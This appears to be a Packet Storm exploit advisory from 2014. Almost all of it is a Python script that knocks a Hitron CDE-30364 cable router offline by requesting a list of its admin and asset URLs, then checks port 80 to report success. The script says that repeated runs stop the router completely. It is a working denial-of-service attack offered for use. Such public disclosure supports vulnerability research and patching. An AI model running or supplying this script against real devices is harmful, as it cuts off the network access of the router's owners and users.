Hitron Technologies CDE-30364 Denial Of Service

2014-08-06T00:00:00
ID PACKETSTORM:127778
Type packetstorm
Reporter Matias Mingorance Svensson
Modified 2014-08-06T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
#-----------------------------------------------------------------------------------------  
  
#Description:  
#-----------------------------------------------------------------------------------------  
  
#Hitron Technologies CDE-30364 is a famous ONO Router.  
  
#Scanning certain sensitive urls the router is restarted. If you run the  
script several times, it stops working.  
  
import httplib  
import socket  
import time  
  
print  
"\n###########################################################################################################"  
  
print "# Exploit Title: Router ONO Hitron CDE-30364 - Remote  
reboot #"  
print "# Date:  
8-10-2013  
#"  
print "# Exploit Author: Matias Mingorance Svensson -  
matias.ms[at]owasp.org  
#"  
print "# Vendor Homepage:  
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/  
#"  
print "# Tested on: Hitron Technologies  
CDE-30364 #"  
print "# Version HW:  
1A  
#"  
print "# Version SW:  
3.1.0.8-ONO  
#"  
print  
"###########################################################################################################\n"  
  
  
host = '192.168.1.1'  
  
#Sensitive urls  
directories = ['login.asp', 'config.asp', 'reset.asp', 'css',  
'css/webONO.css', 'css/ie7ONO.css', 'css/ie6ONO.css', 'js/',  
'js/common.js', 'js/dict.js', 'js/hover.js', 'goform/login',  
'goform/ConfigCable', 'admin/cable-Systeminfo.asp']  
  
for directory in directories:  
conn = httplib.HTTPConnection(host)  
conn.request('GET', '/' + directory)  
r1 = conn.getresponse()  
print r1.status, r1.reason  
  
conn.close()  
  
#Check 80 port  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
time.sleep(4)  
try:  
s.connect((host, 80))  
s.shutdown(2)  
print "\n"  
print "----------------------------------------------------------\n"  
print "Attack Fail!\n"  
except:  
print "----------------------------------------------------------\n"  
print "Attack Successful! The router is rebooting!\n"  
print "Run the script several times to stop router completely!\n"  
  
--   
Un saludo,  
Matías Mingorance Svensson  
*OWASP Foundation, Open Web Application Security Project*  
https://www.owasp.org  
http://es.linkedin.com/in/matiasms  
`